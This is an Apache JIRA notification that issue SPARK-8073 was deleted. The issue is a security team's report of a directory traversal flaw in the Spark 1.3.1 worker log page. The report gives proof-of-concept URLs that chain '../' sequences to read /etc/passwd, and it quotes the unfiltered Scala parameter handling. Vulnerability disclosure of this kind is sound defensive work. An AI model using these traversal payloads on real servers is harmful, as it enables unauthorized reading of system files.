[
https://issues.apache.org/jira/browse/SPARK-8073?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Patrick Wendell deleted SPARK-8073:
-----------------------------------
> Directory traversal vulnerability
> ---------------------------------
>
> Key: SPARK-8073
> URL: https://issues.apache.org/jira/browse/SPARK-8073
> Project: Spark
> Issue Type: Bug
> Environment: Centos6.4
> Reporter: 0keeTeam
> Priority: Critical
>
> We are a information security team from QIHU 360 company, China.
> We found a 0day vulnerability in spark and writing to apply for a CVE
> ID,Please refer to below report. Thanks!
> [Team info]
> name: 0keeTeam
> company: QIHU 360 company, China
> email: [email protected]
> Details of the vulnerability are as follows:
> {color:red}
> Poc&Exp:
> http://xxx.com/logPage/?appId=../../../../../../../../../../../../../../../&executorId=&logType=etc/passwd
> or:
> http://xxx.com/logPage/?driverId=../../../../../../../../../../../../../../../&logType=etc/passwd
> {color}
> *spark-1.3.1\core\src\main\scala\org\apache\spark\deploy\worker\ui\LogPage.scala
> : Line36:*
> {quote}{color:red}// parameters get from GET are not filtered{color}
> val appId = Option(request.getParameter("appId"))
> val executorId = Option(request.getParameter("executorId"))
> val driverId = Option(request.getParameter("driverId"))
> val logType = request.getParameter("logType")
> val offset = Option(request.getParameter("offset")).map(_.toLong)
> val byteLength =
> Option(request.getParameter("byteLength")).map(_.toInt).getOrElse(defaultBytes)
> ........
> val (logText, startByte, endByte, logLength) = getLog(logDir, logType,
> offset, byteLength)
> {quote}
> *and Line125:*
> {quote}
> private def getLog(
> ........
> val files = RollingFileAppender.getSortedRolledOverFiles(logDirectory,
> logType)
> ........
> val logText = Utils.offsetBytes(files, startIndex, endIndex)
> {quote}
> *spark-1.3.1\core\src\main\scala\org\apache\spark\util\logging\RollingFileAppender.scala
> :Line152:*
> {quote}
> def getSortedRolledOverFiles(directory: String, activeFileName: String):
> ........
> val file = new File(directory, activeFileName).getAbsoluteFile
> ........
> {quote}
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
